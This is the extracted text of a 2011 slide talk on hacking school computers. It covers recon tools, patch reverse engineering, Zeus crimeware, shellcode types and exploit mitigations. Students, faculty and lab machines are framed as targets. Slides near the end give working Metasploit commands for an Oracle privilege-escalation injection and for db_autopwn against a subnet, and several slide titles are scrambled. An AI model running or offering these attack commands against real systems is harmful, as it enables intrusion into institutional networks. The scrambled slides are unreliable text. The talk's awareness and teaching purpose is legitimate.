Presentation IT4BC 2011

1. g Sc hool
Ha ckin
mpu ters
Co r Grade
s
d Bette
Fun, P rofit, an

2. What do these people
have in common?
! Lindsay Lohan
! Paris Hilton
! Snooki
! Charile Sheen

3. Jail

4. Albert Gonzales
! Hacked Wireless
! Hacked TJ Maxx
! 90 Million Credit cards stolen
! 20 years in Jail

5. Hacking = Jail

6. Detective Quiz
! Pictures have in common
! Cat, Chicken, Pig, Donkey, Farmer

8. Don’t judge book by cover

9. Motivation of Hackers
! Is money, no question about it
! People rob banks and pick pocket wallets for
money
! Jail

11. Reality of Today
! Hackers are stealing money from computers
! Soon smartphones
! Smartphone hacking rising
! Take over the world, just like Dr. Evil

12. u sec ure?
Are yo
PCI
u passed
a re if yo
do esn’t c
B ad guy

13. Perimeter is dead
! You might have a firewall
! Tons of traffic are punched through holes in your
firewalls
! Billions of packets
! How do you know you are secure?

14. Don’t ignore the signs

15. Bad Guys
! are after you systems. They want to hack you.

16. About me
! Work at Capliano University
! Hack wet paper bags for a living
! I Love 80’s music
! I Love riding my bike from downtown Vancouver
! To North Vancouver

17. About Me
! I love Backtrack4
! Some people call me a blackhat
! But I’ve always been a good guy since the RCMP

18. About Me
! Love Plants vs Zombies
! And my Macbook Pro
! Read NIST publications
! Windows Forensics Analysis Book
! Rootkits Arsenal Book

19. Reading List
! Shellcoders Handbook
! Mac Shellcoders Handbook
! Reverse Engineering Book
! Security Power Tools Book

20. Webistes
! Google
! Youtube
! Larry Zelster
! Sans.org
! DFRWS

21. Build a Hacking
Workstation
! BackTrack4
! SIFT Workstation
! Maltego
! Nessus
! Nmap
! Metasploit
! Wireshark
! Python
! Ruby

22. Hacker Cons that I follow
! DEFCON
! CanSecWest
! SecTor
! Blackhat
! CCC

23. g Sc hool
Ha ckin
mpu ters
Co grades
d b etter
Fun, P rofit, an

24. ey do that?
How d id th

25. Methodology
! Reconnaissance
! Exploit Development
! Exploit
! Maintain Access

26. Recon
! Blackhats on your network
! Dumpster diving
! Going through your garbage and old systems

27. Tools for Recon
! Maltego for analysis
! Scanning your network with Nessus
! Scanning your network with nmap
! Using Metasploit toolset

28. Tools for recon
! theHarvester
! Metagoofil
! Wireshark
! Etherape
! Watching students
! Watching staff and faculty

29. Methodology
! Reconnaissance
! Exploit Development
! Exploit
! Maintain Access

30. 1972
d
C is invente

31. jecti ve - C
Ob
1983

32. 1988
NeXT

33. Buys NeXT
9 96 A pple
1

34. 2002
OSX

35. 2007
.0
iPho ne OS 2
K
iPh one SD

36. 2009 n now progra
m
rs ca
velope
iPhone De

37. mework
atio n Fra
Fo und Method
s
se s and
dreds of Clas
Hun

38. Model Controller

39. Problem = Bound Checks

40. Methods to creating
exploits
! Finding Zero Days
! Reverse Engineering patches
! Using malware creation kits
! Creating shellcode to exploit OS

41. Finding 0day vulns
! Fuzzing
! Smart Fuzzing
! Dumb Fuzzing
! Distributed Fuzzing

42. Fuzzing
! Involves providing invalid, unexpected, or
random data to the inputs of a computer
program
! Interrupting program flow

45. Methods to creating
exploits
! Finding Zero Days
! Reverse Engineering patches
! Using malware creation kits
! Creating shellcode to exploit OS

46. Microsoft Patches
! Every month Microsoft releases patches
! You can identify vulnerabilities in the code and
create exploits for the vuln

47. Reverse Engineers
! Reverse engineer Microsoft patches
! Create specialized exploit code to exploit
specific Microsoft vulnerabilities

48. Reverse Engineering
Tools
! IDA Pro
! Immunity Debugger
! binDiff
! PaiMei
! Vmware
! Python scripts

49. Using binDiff to find vulns

50. Remote Code
Execution
New control

51. IDA Pro
! Dissassembler
! Used to reverse engineer the binary
! Translates machine code to C

52. Methods to creating
exploits
! Finding Zero Days
! Reverse Engineering patches
! Using malware creation kits
! Creating shellcode to exploit OS

53. Zeus (Zbot)

54. Zeus research
! Source code on the Internet
! Lots of analysis by big anti-virus vendors
! Screenshots on the Internet of the Zeus Builder
interface, Configuration interface

55. Immediately Post-Infection
! Zeus downloads encrypted config
file
! Transmits systems details to C2
server
! Receives additional commands

56. How do get infected?
! Drive by Download
! Phishing scams
! Malicious Email attachments
! Bogus Zeus Crimeware Downloads
! SQL Injected Websites

58. Controllers of ZBOT
! Capture (banking) credentials
! Remote control
! Keystroke logging
! Screen capture
! Proxy services

59. Typical Theft
! Attackers steal credentials
! Set up bogus employee/vendor
accounts
! Accounts are actually “mules”
! Transfers typically kept under $10K

60. Wire Money
! Eastern Europe

61. Methods to creating
exploits
! Finding Zero Days
! Reverse Engineering patches
! Using malware creation kits
! Creating shellcode to exploit OS

62. Reference books
! Shellcoders Handbook
! MacHackers Handbook

63. Shellcode Fun
! Stack Overflows
! Heap Spray

64. Stack Overflow
! Typically found in C type code
! No bounds checking
! Always new C code being created J

65. Heap Spray
! Commonly used in Javascript browser attacks
! Can be used in putting shellcode into various
parts of unused memory
! If you find your code…game over.

66. NOP sled and shellcode
! 0x90 = Intel x86 opcode
! a.k.a = NOP slide or NOP ramp
! NOP (no-operation) instruction sequence meant
to "slide" the CPU's instruction execution flow to
its final, desired, destination.

67. Allocated Memory
Unused Memory Shellcode

68. Shellcode
Shellcode
Allocated Memory
Shellcode
Unused Memory Shellcode
Shellcode
Shellcode
Shellcode
Shellcode
Shellcode
Shellcode
Shellcode
Shellcode

69. Shellcode
! Local
! Remote
! Download and Execute
! Staged
! Egg Hunt
! Omelet

70. Local
• Local shellcode is used by an attacker who has
limited access to a machine
• Privilege escalation from user to Admin/root

71. Remote
• Remote shellcode can provide the bad guy access
to the victim machine across a network
• Remote shellcode normally use standard TCP/IP
• Connect-back shellcode is used to connect back
to the bad guys's machine

72. Download and Execute
• Download and execute is a type of remote
shellcode
• Instructs the victim machine to download bad
guy’s executable file off the network, save it to disk
and execute it
• This is a drive-by download attack!

73. Staged
• When memory space is small for a process
• Recommned staged shellcode to execute in
stages
• First, a small piece of shellcode (stage 1) is
executed. This code then downloads a larger piece
of shellcode (stage 2) into the process's memory
and executes it

75. Egg-Hunt
• Small egg-hunt shellcode is injected into the
process at a predictable location and executed
• This code then searches the process's address
space for the larger shellcode (the egg) and
executes it

77. Omelet
• This type of shellcode uses multiple small blocks
of data (eggs) and recombines them into one
larger block (the omelet)

78. Shellcode research
! Smartphone exploits
! Breaking Arms by M.J. Keith

79. Stack and Heap Spray
! Countermeasures

80. DEP
! Makes pages of memory
! Read only
! Not executable

81. ASLR
! Mitigation technique which involves randomly
arranging the positions of key data areas
! Stack Overflow protection

82. Microsoft Redhat Apple
win7 XP 2000 RHEL Open OSX
BSD
ASLR
Stack Protection
Heap Protection

83. Finding Targets to Exploit
! A.K.A = Victims

84. Targets
! Students
! Teachers and Staff
! Wireless, VOIP, Photocopiers, Lab computers,
staff computers, faculty computers, servers
! Networks

85. Find a FOOTHOLD

86. Register for a class

87. Exploit Lab Computers

88. Exploit Faculty Computer

89. Exploit Websites
! Any internet services
! SSH
! HTTP
! HTTPS
! FTP

90. Exploit Toolkits
! Vmware
! Backtrack4
! Metasploit

91. Social Engineering Toolkit
! Drive by Downloads

94. Fake AV
! Drive by Download Kings

97. Oracle Hacking
! Need IP address
! Need Listening Port
! Need SID
! Need Username and Password

98. Oracle Attack
Methodology
! Determine Version and SID
! Guess or Brute Force Username and Password
! Privilege Escalation via SQL Injection
! Data Manipulation or post data
! Cover your tracks…muhahahahaha

99. msfconsole commands
! msf auxiliary(lt_findricset) > set RHOST 172.10.1.109
! msf auxiliary(lt_findricset) > set RPORT 1521
! msf auxiliary(lt_findricset) > set DBUSER SCOTT
! msf auxiliary(lt_findricset) > set DBPASS TIGER
! msf auxiliary(lt_findricset) > set SID ORCL
! msf auxiliary(lt_findricset) > set SQL GRANT DBA TO SCOTT

100. Extra DB Hacking
! db_autopwn
! SQL Injection

101. db_autopwn
! msf > load db_mysql
! msf > db_create root:password@localhost/
pentest
! msf > db_nmap -A 192.168.1.0/24
! msf > db_hosts
! msf > db_autopwn -pb

102. SQL Injection via
SYS.LT.FINDRICSET
register_options( [OptString.new('SQL', [ false,
'SQL to execute.', "GRANT DBA to #{datastore
['DBUSER']}"]),], self.class)
• grants the DBA permission to the DBUSER in 10g

103. Fasttrack and auto_pwn

108. Miscellaneous Fun
! Firesheep
! Ettercap
! SSLStrip

109. Last Resort
! Teensy.pde
! Powershell SAM dumps
! Hacking update services like
windowsupdate.com
! UPS OpenWRT

110. Last Last Resort
! Create prize like IPAD2 win
! W3AF for webscanning apps
! Lock picking Kensington Locks with Toilet roll
! Wireless conversations with Mallory and
JavaSnoop

111. Maintain Access
! The Rootkit Arsenal is a great book
! Create Zombies and Bots
! Use Backtrack4
! Use Metasploit

112. Migrating process
! Avoiding detection
! In Metasploit after you PWN a system
! There is a Meterpreter Script to migrate process

114. Methodology
! Reconnaissance
! Exploit Development
! Exploit
! Maintain Access

115. Thoughts and musings

117. Creating FakeAV for
! Smartphone?
! Make Billions

118. Quiz

119. The Matrix
! Is this movie about hacking?

120. Yes, Yes and Yes
! A computer hacker learns from mysterious
rebels about the true nature of his reality and his
role in the war against its controllers

121. Is Backtrack an exploit?

122. Penetration Testing
and Security Auditing
Linux Distribution

123. How many hits?
! Word hacking in on Google

124. Over 83 Million Hits

125. How many hits
! When you search youtube?

126. Over 29,000 hits

127. How many PC’s deployed
worldwide?

128. Over 1.2 Billion PC’s

129. How many smartphones?
What’s the future market?

130. Over 5 Billion Smartphones

131. What does hacking get you?

132. New friends

133. Place to stay. 3 meals.

134. Job Retraining

136. You are under arrest for
Section 342.1
Unauthorized use of
computer, do you
understand?

137. You have the right to retain
and instruct counsel without
delay.
We will provide you with a toll-
free telephone lawyer referral
service, if you do not have
your own lawyer.

138. Anything you say can be used
in court as evidence.
Do you understand? Would
you like to speak to a lawyer?

139. Photo Credits = Internet

140. Thank you! J
! </end>